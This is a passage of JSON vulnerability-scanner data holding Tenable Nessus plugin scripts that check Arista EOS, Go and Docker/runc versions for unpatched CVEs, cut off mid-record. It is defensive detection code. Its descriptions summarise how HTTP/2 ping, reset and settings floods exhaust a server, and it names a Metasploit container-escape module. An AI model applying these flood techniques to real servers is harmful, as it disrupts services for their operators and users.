6e23649d7b989a7a0bb196ddb259488b534f6939a0c906d997aa311fa89856f78f4c2ceaf85e024da2b5e77605f16182a6e7623afdb31df019d1a0279419e05a5f3cc24fc313ae9592a411fabf9a4c0e55d1f24a3ef7a6aa5c390652c307d3d1ab512b078624033877ae145dc7a7a0f1ffa89969a361c1d989f24ec71fd8e6e1632636fbcfb4932bde51b26b37baf441e89dc723aabaa7edf75a5ad881654c8bd66e406f7de212e42c9da9ae1dcf034422d4306ec55cdeff192cabffe2ee36a8edc06bd40f94aff3e90891d6996189f1c522d16b7745f70e230a5dc40cec9c1e3f6e584c0b3dcf2a9e4ca7728e8bf80ba58ff92b482286faee17c0dc56bb6f3fdb45dae0bb353918033c16e88edfe65757ce73360053992ca675865ed6cb4617e70c1bea0663172b91d150b5c8b6483040de1fab2550ad7adab4b8ba0618316a5d5c671a8e9ab7cfe07533a13b0fbf55535b5c66dbefa57f67ff82ccac8778cb9a57f4fe7365bdb942c2b08512c5190411649ac680f7736b1803d40d1d4d66ef6d2e42fe57e3688330cb97ce1a867bce21348395c3629ba910c050dd13b7878cbad66579db24229915ec99bc04b5c559c28be86a1b89fa4f4b6c659b7f5525bea6feb9d2f89d4ffa8173816a8ac314e23831b239a4996763db51ce95a9286bfce55c936f55e51b291edcc1d8b63de9daa8e46901d9a81080f9c773c26a1ca83c\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134419);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-9512\", \"CVE-2019-9514\", \"CVE-2019-9515\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n\n script_name(english:\"Arista Networks EOS Multiple Vulnerabilities (SA0043)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Arista Networks EOS running on the remote device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Arista Networks EOS running on the remote device is affected by the following vulnerabilities:\n\n - HTTP/2 implementations are vulnerable to ping floods, potentially leading to a denial of service (DoS).\n An unauthenticated, remote attacker can exploit this, by sending continual pings to an HTTP/2 peer,\n causing the peer to build an internal queue of responses. Depending on how efficiently this data is\n queued, this can consume excess CPU, memory, or both. (CVE-2019-9512)\n\n - HTTP/2 implementations are vulnerable to a reset flood, potentially leading to a DoS. An unauthenticated, \n remote attacker can open a number of streams and send an invalid request over each stream that should\n solicit a stream of RST_STREAM frames from the peer. Depending on how the peer queues the RST_STREAM\n frames, this can consume excess memory, CPU, or both. (CVE-2019-9514)\n\n - HTTP/2 implementations are vulnerable to a settings flood, potentially leading to a DoS. An\n unauthenticated, remote attacker can exploit this by sending a stream of SETTINGS frames to the peer.\n Since the RFC requires that the peer reply with one acknowledgement per SETTINGS frame, an empty SETTINGS\n frame is almost equivalent in behavior to a ping. Depending on how efficiently this data is queued, this\n can consume excess CPU, memory, or both. (CVE-2019-9515)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://www.arista.com/en/support/advisories-notices/security-advisories/8762-security-advisory-43\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e5070013\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the patch or or mitigation or upgrade to a fixed version as referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-9515\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/11\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:arista:eos\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"arista_eos_detect.nbin\");\n script_require_keys(\"Host/Arista-EOS/Version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude('arista_eos_func.inc');\ninclude('audit.inc');\n\nif (report_paranoia < 2)\n audit(AUDIT_PARANOID);\n\nversion = get_kb_item_or_exit('Host/Arista-EOS/Version');\n\nif (version =~ \"([^0-9]|^)4\\.22\\.(0|0\\.1|0\\.2|1|2)F\" ||\n version =~ \"([^0-9]|^)4\\.23\\.(0|0\\.1)F\")\n{\n ext='SecurityAdvisory0043Hotfix-4.22-4.23.rpm 1.0.0/eng';\n sha='ef84fb5e4eb2ffe9f1cf2904cb1b496fb115c444de21f4cf38858daa4a0cba35a6cad9677d01b8f1885df42ff15368c864998eb4afcc7625e39195e08f65c669';\n\n if(eos_extension_installed(ext:ext, sha:sha))\n audit(AUDIT_HOST_NOT, 'affected as a relevant hotfix has been installed');\n}\nelse if (version =~ \"([^0-9]|^)4\\.20\\.(11|11\\.1|12|12\\.1|13|13\\.1|14)M\" ||\n version =~ \"([^0-9]|^)4\\.21\\.(7|7\\.1|8)M\")\n{\n ext='SecurityAdvisory0043Hotfix-4.20-4.21.rpm 1.0.0/eng';\n sha='be17fce400045ee63c7d77cb756e47aebf460c878793b1984ed3c79f7c3be3ec189c986afdcbc3d1814170d2e1f5c594b3ac7d179ebe05eda05c4919d9789036';\n\n if(eos_extension_installed(ext:ext, sha:sha))\n audit(AUDIT_HOST_NOT, 'affected as a relevant hotfix has been installed');\n}\n\n\nvmatrix = make_array();\nvmatrix['all'] = make_list('4.22<=4.22.2',\n '4.21<=4.21.7.1',\n '4.20<=4.20.14',\n '4.19<=4.19.13',\n '4.18<=4.18.99',\n '4.17<=4.17.99');\nvmatrix['F'] = make_list('4.23.0F');\n\nvmatrix['fix'] = '4.20 >= 4.20.15M / 4.21 >= 4.21.9M / 4.22 >= 4.22.3F / 4.23 >= 4.23.1F';\n\nif (eos_is_affected(vmatrix:vmatrix, version:version))\n security_report_v4(severity:SECURITY_HOLE, port:0, extra:eos_report_get());\nelse\n audit(AUDIT_INST_VER_NOT_VULN, 'Arista Networks EOS', version);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-02-10T14:51:38", "description": "This update for go1.11 fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2019-9512: Fixed HTTP/2 flood using PING frames that results in unbounded memory growth (bsc#1146111).\n\n - CVE-2019-9514: Fixed HTTP/2 implementation that is vulnerable to a reset flood, potentially leading to a denial of service (bsc#1146115).\n\n - CVE-2019-14809: Fixed malformed hosts in URLs that leads to authorization bypass (bsc#1146123).\n\nBugfixes :\n\n - Update to go version 1.11.13 (bsc#1141688).\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-09-06T00:00:00", "type": "nessus", "title": "openSUSE Security Update : go1.11 (openSUSE-2019-2072) (Ping Flood) (Reset Flood)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14809", "CVE-2019-9512", "CVE-2019-9514"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:go1.11", "p-cpe:/a:novell:opensuse:go1.11-race", "cpe:/o:novell:opensuse:15.1"], "id": "OPENSUSE-2019-2072.NASL", "href": "https://www.tenable.com/plugins/nessus/128541", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-2072.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(128541);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-14809\", \"CVE-2019-9512\", \"CVE-2019-9514\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n\n script_name(english:\"openSUSE Security Update : go1.11 (openSUSE-2019-2072) (Ping Flood) (Reset Flood)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for go1.11 fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2019-9512: Fixed HTTP/2 flood using PING frames that\n results in unbounded memory growth (bsc#1146111).\n\n - CVE-2019-9514: Fixed HTTP/2 implementation that is\n vulnerable to a reset flood, potentially leading to a\n denial of service (bsc#1146115).\n\n - CVE-2019-14809: Fixed malformed hosts in URLs that leads\n to authorization bypass (bsc#1146123).\n\nBugfixes :\n\n - Update to go version 1.11.13 (bsc#1141688).\n\nThis update was imported from the SUSE:SLE-15:Update update project.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1141688\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1146111\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1146115\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1146123\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected go1.11 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-14809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/09/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/09/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:go1.11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:go1.11-race\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"go1.11-1.11.13-lp151.2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"go1.11-race-1.11.13-lp151.2.9.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"go1.11 / go1.11-race\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-02-11T15:18:00", "description": "This update for containerd, docker, docker-runc, golang-github-docker-libnetwork fixes the following issues :\n\nDocker :\n\n - CVE-2019-14271: Fixed a code injection if the nsswitch facility dynamically loaded a library inside a chroot (bsc#1143409).\n\n - CVE-2019-13509: Fixed an information leak in the debug log (bsc#1142160).\n\n - Update to version 19.03.1-ce, see changelog at /usr/share/doc/packages/docker/CHANGELOG.md (bsc#1142413, bsc#1139649).\n\nrunc :\n\n - Use %config(noreplace) for /etc/docker/daemon.json (bsc#1138920).\n\n - Update to runc 425e105d5a03, which is required by Docker (bsc#1139649).\n\ncontainerd :\n\n - CVE-2019-5736: Fixed a container breakout vulnerability (bsc#1121967).\n\n - Update to containerd v1.2.6, which is required by docker (bsc#1139649).\n\ngolang-github-docker-libnetwork :\n\n - Update to version git.fc5a7d91d54cc98f64fc28f9e288b46a0bee756c, which is required by docker (bsc#1142413, bsc#1139649).\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-08-30T00:00:00", "type": "nessus", "title": "openSUSE Security Update : containerd / docker / docker-runc / etc (openSUSE-2019-2021)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10892", "CVE-2019-13509", "CVE-2019-14271", "CVE-2019-5736"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:containerd", "p-cpe:/a:novell:opensuse:containerd-ctr", "p-cpe:/a:novell:opensuse:docker", "p-cpe:/a:novell:opensuse:docker-bash-completion", "p-cpe:/a:novell:opensuse:docker-debuginfo", "p-cpe:/a:novell:opensuse:docker-libnetwork", "p-cpe:/a:novell:opensuse:docker-libnetwork-debuginfo", "p-cpe:/a:novell:opensuse:docker-runc", "p-cpe:/a:novell:opensuse:docker-runc-debuginfo", "p-cpe:/a:novell:opensuse:docker-test", "p-cpe:/a:novell:opensuse:docker-test-debuginfo", "p-cpe:/a:novell:opensuse:docker-zsh-completion", "p-cpe:/a:novell:opensuse:golang-github-docker-libnetwork", "cpe:/o:novell:opensuse:15.1"], "id": "OPENSUSE-2019-2021.NASL", "href": "https://www.tenable.com/plugins/nessus/128409", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-2021.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(128409);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2018-10892\",\n \"CVE-2019-13509\",\n \"CVE-2019-14271\",\n \"CVE-2019-5736\"\n );\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0725\");\n\n script_name(english:\"openSUSE Security Update : containerd / docker / docker-runc / etc (openSUSE-2019-2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for containerd, docker, docker-runc,\ngolang-github-docker-libnetwork fixes the following issues :\n\nDocker :\n\n - CVE-2019-14271: Fixed a code injection if the nsswitch\n facility dynamically loaded a library inside a chroot\n (bsc#1143409).\n\n - CVE-2019-13509: Fixed an information leak in the debug\n log (bsc#1142160).\n\n - Update to version 19.03.1-ce, see changelog at\n /usr/share/doc/packages/docker/CHANGELOG.md\n (bsc#1142413, bsc#1139649).\n\nrunc :\n\n - Use %config(noreplace) for /etc/docker/daemon.json\n (bsc#1138920).\n\n - Update to runc 425e105d5a03, which is required by Docker\n (bsc#1139649).\n\ncontainerd :\n\n - CVE-2019-5736: Fixed a container breakout vulnerability\n (bsc#1121967).\n\n - Update to containerd v1.2.6, which is required by docker\n (bsc#1139649).\n\ngolang-github-docker-libnetwork :\n\n - Update to version\n git.fc5a7d91d54cc98f64fc28f9e288b46a0bee756c, which is\n required by docker (bsc#1142413, bsc#1139649).\n\nThis update was imported from the SUSE:SLE-15:Update update project.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1100331\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1121967\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1138920\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1139649\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1142160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1142413\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1143409\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected containerd / docker / docker-runc / etc packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-5736\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Docker Container Escape Via runC Overwrite');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/08/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:containerd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:containerd-ctr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:docker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:docker-bash-completion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:docker-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:docker-libnetwork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:docker-libnetwork-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:docker-runc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:docker-runc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:docker-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:docker-test-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:docker-zsh-completion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:golang-github-docker-libnetwork\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"containerd-1.2.6-lp151.2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"containerd-ctr-1.2.6-lp151.2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"docker-19.03.1_ce-lp151.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"docker-bash-completion-19.03.1_ce-lp151.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"docker-debuginfo-19.03.1_ce-lp151.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"docker-libnetwork-0.7.0.1+gitr2800_fc5a7d91d54c-lp151.2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"docker-libnetwork-debuginfo-0.7.0.1+gitr2800_fc5a7d91d54c-lp151.2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"docker-runc-1.0.0rc8+gitr3826_425e105d5a03-lp151.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"docker-runc-debuginfo-1.0.0rc8+gitr3826_425e105d5a03-lp151.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"docker-test-19.03.1_ce-lp151.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"docker-test-debuginfo-19.03.1_ce-lp151.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"docker-zsh-completion-19.03.1_ce-lp151.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"golang-github-docker-libnetwork-0.7.0.1+gitr2800_fc5a7d91d54c-lp151.2.6.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"containerd / containerd-ctr / docker-runc / docker-runc-debuginfo / etc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-11T15:17:30", "description": "This update for containerd, docker, docker-runc, golang-github-docker-libnetwork fixes the following issues :\n\nDocker :\n\nCVE-2019-14271: Fixed a code injection if the nsswitch facility dynamically loaded a library inside a chroot (bsc#1143409).\n\nCVE-2019-13509: Fixed an information leak in the debug log (bsc#1142160).\n\nUpdate to version 19.03.1-ce, see changelog at /usr/share/doc/packages/docker/CHANGELOG.md (bsc#1142413, bsc#1139649).\n\nrunc: Use %config(noreplace) for /etc/docker/daemon.json (bsc#1138920).\n\nUpdate to runc 425e105d5a03, which is required by Docker (bsc#1139649).\n\ncontainerd: CVE-2019-5736: Fixed a container breakout vulnerability (bsc#1121967).\n\nUpdate to containerd v1.2.6, which is required by docker (bsc#1139649).\n\ngolang-github-docker-libnetwork: Update to version git.fc5a7d91d54cc98f64fc28f9e288b46a0bee756c, which is required by docker (bsc#1142413, bsc#1139649).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-08-14T00:00:00", "type": "nessus", "title": "SUSE SLED15 / SLES15 Security Update : containerd, docker, docker-runc, golang-github-docker-libnetwork (SUSE-SU-2019:2117-1)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10892", "CVE-2019-13509", "CVE-2019-14271", "CVE-2019-5736"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:containerd", "p-cpe:/a:novell:suse_linux:containerd-ctr", "p-cpe:/a:novell:suse_linux:containerd-kubic", "p-cpe:/a:novell:suse_linux:containerd-kubic-ctr", "p-cpe:/a:novell:suse_linux:docker", "p-cpe:/a:novell:suse_linux:docker-debuginfo", "p-cpe:/a:novell:suse_linux:docker-kubic", "p-cpe:/a:novell:suse_linux:docker-kubic-debuginfo", "p-cpe:/a:novell:suse_linux:docker-kubic-kubeadm-criconfig", "p-cpe:/a:novell:suse_linux:docker-kubic-test", "p-cpe:/a:novell:suse_linux:docker-kubic-test-debuginfo", "p-cpe:/a:novell:suse_linux:docker-libnetwork", "p-cpe:/a:novell:suse_linux:docker-libnetwork-debuginfo", "p-cpe:/a:novell:suse_linux:docker-libnetwork-kubic", "p-cpe:/a:novell:suse_linux:docker-libnetwork-kubic-debuginfo", "p-cpe:/a:novell:suse_linux:docker-runc", "p-cpe:/a:novell:suse_linux:docker-runc-debuginfo", "p-cpe:/a:novell:suse_linux:docker-runc-kubic", "p-cpe:/a:novell:suse_linux:docker-runc-kubic-debuginfo", "p-cpe:/a:novell:suse_linux:docker-test", "p-cpe:/a:novell:suse_linux:docker-test-debuginfo", 